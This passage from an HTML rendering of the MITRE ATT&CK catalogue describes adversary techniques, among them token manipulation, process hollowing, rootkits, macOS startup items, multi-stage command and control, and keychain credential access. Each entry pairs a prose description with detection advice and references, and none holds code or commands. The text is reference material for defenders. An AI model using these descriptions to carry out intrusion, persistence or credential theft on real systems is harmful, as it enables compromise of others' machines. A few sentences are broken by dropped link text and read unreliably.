<p>If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.</p>
</div>
<div class="paragraph">
<p>There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt;[[Citation: Microsoft LogonUser]], &lt;code&gt;DuplicateTokenEx&lt;/code&gt;[[Citation: Microsoft DuplicateTokenEx]], and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;[[Citation: Microsoft ImpersonateLoggedOnUser]]). Please see the referenced Windows API pages for more information.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Tom Ueltschi @c_APT_ure</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 557. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1134">https://attack.mitre.org/wiki/Technique/T1134</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing">https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/">https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.offensive-security.com/metasploit-unleashed/fun-incognito/">https://www.offensive-security.com/metasploit-unleashed/fun-incognito/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490994.aspx">https://technet.microsoft.com/en-us/library/bb490994.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pentestlab.blog/2017/04/03/token-manipulation/">https://pentestlab.blog/2017/04/03/token-manipulation/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_custom_command_and_control_protocol"><a class="anchor" href="#_custom_command_and_control_protocol"></a><a class="link" href="#_custom_command_and_control_protocol">Custom Command and Control Protocol</a></h3>
<div class="paragraph">
<p>Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 558. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1094">https://attack.mitre.org/wiki/Technique/T1094</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_system_permissions_weakness"><a class="anchor" href="#_file_system_permissions_weakness"></a><a class="link" href="#_file_system_permissions_weakness">File System Permissions Weakness</a></h3>
<div class="paragraph">
<p>Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.</p>
</div>
<div class="paragraph">
<p>Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</p>
</div>
<div class="paragraph">
<p>===Services===</p>
</div>
<div class="paragraph">
<p>Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.</p>
</div>
<div class="paragraph">
<p>===Executable Installers===</p>
</div>
<div class="paragraph">
<p>Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.[[Citation: Mozilla Firefox Installer DLL Hijack]][[Citation: Seclists Kanthak 7zip Installer]]</p>
</div>
<div class="paragraph">
<p>Detection: Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to <a id="Discovery"></a> or other adversary techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Services, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM, User, Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 559. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1044">https://attack.mitre.org/wiki/Technique/T1044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/">https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://seclists.org/fulldisclosure/2015/Dec/34">http://seclists.org/fulldisclosure/2015/Dec/34</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_hollowing"><a class="anchor" href="#_process_hollowing"></a><a class="link" href="#_process_hollowing">Process Hollowing</a></h3>
<div class="paragraph">
<p>Process hollowing occurs when a process is created in a suspended state and the process&#8217;s memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different.DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior.</p>
</div>
<div class="paragraph">
<p>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 560. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1093">https://attack.mitre.org/wiki/Technique/T1093</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.autosectools.com/process-hollowing.pdf">http://www.autosectools.com/process-hollowing.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scripting"><a class="anchor" href="#_scripting"></a><a class="link" href="#_scripting">Scripting</a></h3>
<div class="paragraph">
<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.</p>
</div>
<div class="paragraph">
<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit[[Citation: Metasploit]], Veil[[Citation: Veil]], and PowerSploit[[Citation: Powersploit]] are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.[[Citation: Alperovitch 2014]]</p>
</div>
<div class="paragraph">
<p>Detection: Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</p>
</div>
<div class="paragraph">
<p>Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information <a id="Discovery"></a>, <a id="Collection"></a>, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, File monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 561. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1064">https://attack.mitre.org/wiki/Technique/T1064</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.metasploit.com">http://www.metasploit.com</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/">http://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.veil-framework.com/framework/">https://www.veil-framework.com/framework/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_removable_media"><a class="anchor" href="#_data_from_removable_media"></a><a class="link" href="#_data_from_removable_media">Data from Removable Media</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system&#8217;s connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 562. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1025">https://attack.mitre.org/wiki/Technique/T1025</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_code_signing"><a class="anchor" href="#_code_signing"></a><a class="link" href="#_code_signing">Code Signing</a></h3>
<div class="paragraph">
<p>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.[[Citation: Wikipedia Code Signing]] However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries[[Citation: Janicab]]. The certificates used during an operation may be created, forged, or stolen by the adversary.[[Citation: Securelist Digital Certificates]][[Citation: Symantec Digital Certificates]]</p>
</div>
<div class="paragraph">
<p>Code signing to verify software on first run can be used on modern Windows and MacOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.[[Citation: Wikipedia Code Signing]]</p>
</div>
<div class="paragraph">
<p>Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</p>
</div>
<div class="paragraph">
<p>Detection: Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 563. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1116">https://attack.mitre.org/wiki/Technique/T1116</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates">http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/security-policies/68593/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/">https://securelist.com/blog/security-policies/68593/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Code%20signing">https://en.wikipedia.org/wiki/Code%20signing</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_window"><a class="anchor" href="#_hidden_window"></a><a class="link" href="#_hidden_window">Hidden Window</a></h3>
<div class="paragraph">
<p>The configurations for how applications run on macOS and OS X are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application&#8217;s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don&#8217;t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window [[Citation: Antiquated Mac Malware]].</p>
</div>
<div class="paragraph">
<p>Detection: Plist files are ASCII text files with a specific format, so they&#8217;re relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 564. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1143">https://attack.mitre.org/wiki/Technique/T1143</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rootkit"><a class="anchor" href="#_rootkit"></a><a class="link" href="#_rootkit">Rootkit</a></h3>
<div class="paragraph">
<p>Rootkits are programs that hide the existence of malware by intercepting and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware.[[Citation: Wikipedia Rootkit]]</p>
</div>
<div class="paragraph">
<p>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.</p>
</div>
<div class="paragraph">
<p>Detection: Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR.[[Citation: Wikipedia Rootkit]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: BIOS, MBR, System calls</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 565. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1014">https://attack.mitre.org/wiki/Technique/T1014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Rootkit">https://en.wikipedia.org/wiki/Rootkit</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_startup_items"><a class="anchor" href="#_startup_items"></a><a class="link" href="#_startup_items">Startup Items</a></h3>
<div class="paragraph">
<p>Per Apples documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items[[Citation: Startup Items]]. This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isnt guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory.</p>
</div>
<div class="paragraph">
<p>An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism[[Citation: Methods of Mac Malware Persistence]]. Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</p>
</div>
<div class="paragraph">
<p>Detection: The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 566. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1165">https://attack.mitre.org/wiki/Technique/T1165</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_command_line_interface"><a class="anchor" href="#_command_line_interface"></a><a class="link" href="#_command_line_interface">Command-Line Interface</a></h3>
<div class="paragraph">
<p>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task).</p>
</div>
<div class="paragraph">
<p>Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</p>
</div>
<div class="paragraph">
<p>Detection: Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 567. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1059">https://attack.mitre.org/wiki/Technique/T1059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Command-line%20interface">https://en.wikipedia.org/wiki/Command-line%20interface</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_command_and_control_channel"><a class="anchor" href="#_exfiltration_over_command_and_control_channel"></a><a class="link" href="#_exfiltration_over_command_and_control_channel">Exfiltration Over Command and Control Channel</a></h3>
<div class="paragraph">
<p>Data exfiltration is performed over the [[Command and Control]] channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</p>
</div>
<div class="paragraph">
<p>Detection: Detection for command and control applies. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 568. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1041">https://attack.mitre.org/wiki/Technique/T1041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multi_stage_channels"><a class="anchor" href="#_multi_stage_channels"></a><a class="link" href="#_multi_stage_channels">Multi-Stage Channels</a></h3>
<div class="paragraph">
<p>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.</p>
</div>
<div class="paragraph">
<p>Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.</p>
</div>
<div class="paragraph">
<p>The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or Fallback Channels in case the original first-stage communication path is discovered and blocked.</p>
</div>
<div class="paragraph">
<p>Detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from <a id="Discovery"></a> of the system and network information or [[Lateral Movement]] to the originating process may also yield useful data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Network device logs, Network protocol analysis, Packet capture, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 569. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1104">https://attack.mitre.org/wiki/Technique/T1104</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keychain"><a class="anchor" href="#_keychain"></a><a class="link" href="#_keychain">Keychain</a></h3>
<div class="paragraph">
<p>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.[[Citation: Wikipedia keychain]] The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.</p>
</div>
<div class="paragraph">
<p>To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault.[[Citation: External to DA, the OS X Way]] By default, the passphrase for the keychain is the users logon credentials.</p>
</div>
<div class="paragraph">
<p>Detection: Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</p>
</div>
<div class="paragraph">
